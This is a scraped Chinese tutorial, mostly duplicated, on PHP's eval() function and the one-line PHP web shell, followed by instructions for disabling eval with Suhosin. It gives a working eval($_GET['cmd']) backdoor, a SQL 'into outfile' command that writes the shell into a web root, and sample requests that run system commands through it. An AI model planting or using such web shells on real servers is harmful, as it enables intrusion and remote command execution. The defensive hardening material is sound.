eval函数简介与PHP一句话木马剖析
2015-01-29 11:26
477 查看
eval函数简介与PHP一句话木马剖析
2.该字符串必须是合法的 PHP 代码,且必须以分号结尾。
3.如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
$string = "beautiful";
$time = "winter";
$str = 'This is a $string $time morning!';
echo $str. "<br />";
eval("\$str = \"$str\";");
echo $str;
?>
输出
This is a $string $time morning!
This is a beautiful winter morning!
1.通过数据库写马:
select "<?php eval($_GET['cmd'])'?>" into outfile "D:\\phpStudy\\WWW\\bb.php",不过这个命令是DB和web在同一台机器的时候可以这样执行
2.通过web写马
<?php
eval($_GET["cmd"]);
?>
访问:
http://localhost/aa.php?cmd=fwrite(fopen("aa.txt", "w"),"hello,world!");
查看php的shell信息:
http://localhost/aa.php?cmd=phpinfo();
查看当前运行的服务
http://localhost/aa.php?cmd=system("net start");
如何禁用eval命令
在php.ini中这样设置disable_functions =eval是无法禁用eval的,根据php手册说明,eval是一个语言构造器而不是一个函数。如果要禁用eval,则需要第三方扩展,使用Suhosin
linux下安装:
php的安装就不写了
suhosin的安装
wget http://download.suhosin.org/suhosin-0.9.23.tgz
tar zxvfsuhosin-0.9.23.tgz
cd suhosin-0.9.23
/usr/local/php/bin/phpize //这一步不能省
./configure --with-php-config=/usr/local/php/bin/php-config //必须在这儿注明php-config所在的绝对路径。
make
make install
Installing shared extensions: /usr/local/php/lib/php/extensions/no-debug-non-zts-20060613/
然后在php.ini中增加一行下列语句。
extension=suhosin.so
suhosin.executor.disable_eval = on
参考文档: http://ju.outofmemory.cn/entry/29300
一:eval函数
1.eval() 函数把字符串按照 PHP 代码来计算。2.该字符串必须是合法的 PHP 代码,且必须以分号结尾。
3.如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
二:eval函数的一般用法
<?php$string = "beautiful";
$time = "winter";
$str = 'This is a $string $time morning!';
echo $str. "<br />";
eval("\$str = \"$str\";");
echo $str;
?>
输出
This is a $string $time morning!
This is a beautiful winter morning!
三:eval函数的特殊用法
eval($_GET["cmd"]);四:php一句话挂马的原理
1.通过数据库写马:
select "<?php eval($_GET['cmd'])'?>" into outfile "D:\\phpStudy\\WWW\\bb.php",不过这个命令是DB和web在同一台机器的时候可以这样执行
2.通过web写马
<?php
eval($_GET["cmd"]);
?>
访问:
http://localhost/aa.php?cmd=fwrite(fopen("aa.txt", "w"),"hello,world!");
查看php的shell信息:
http://localhost/aa.php?cmd=phpinfo();
查看当前运行的服务
http://localhost/aa.php?cmd=system("net start");
五:禁用eval函数
无论是linux服务器还是windows服务器,eval命令是非常危险的如何禁用eval命令
在php.ini中这样设置disable_functions =eval是无法禁用eval的,根据php手册说明,eval是一个语言构造器而不是一个函数。如果要禁用eval,则需要第三方扩展,使用Suhosin
linux下安装:
php的安装就不写了
suhosin的安装
wget http://download.suhosin.org/suhosin-0.9.23.tgz
tar zxvfsuhosin-0.9.23.tgz
cd suhosin-0.9.23
/usr/local/php/bin/phpize //这一步不能省
./configure --with-php-config=/usr/local/php/bin/php-config //必须在这儿注明php-config所在的绝对路径。
make
make install
Installing shared extensions: /usr/local/php/lib/php/extensions/no-debug-non-zts-20060613/
然后在php.ini中增加一行下列语句。
extension=suhosin.so
suhosin.executor.disable_eval = on
参考文档: http://ju.outofmemory.cn/entry/29300
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- php eval函数用法----PHP中eval()函数小技巧
- asp,php一句话木马整理方便查找木马
- php 过滤函数简介用于跨站分析
- php eval函数用法 PHP中eval()函数小技巧
- PHP eval() 函数
- 全面详尽剖析一句话asp木马
- PHP中ini_set和ini_get函数用法简介
- 【转】php eval函数用法----PHP中eval()函数小技巧
- STL源码剖析之仿函数简介
- php eval函数用法总结
- php eval函数用法
- php eval函数用法
- PHP中eval()函数小技巧
- php eval函数用法----PHP中eval()函数小技巧
- 【转】php eval函数用法----PHP中eval()函数小技巧
- asp,php一句话木马整理方便查找木马
- php str_pad 函数用法简介
- PHP访问MySQL数据库函数简介
- PHP 中ini_set和ini_get函数用法简介
- php eval函数用法 PHP中eval()函数小技巧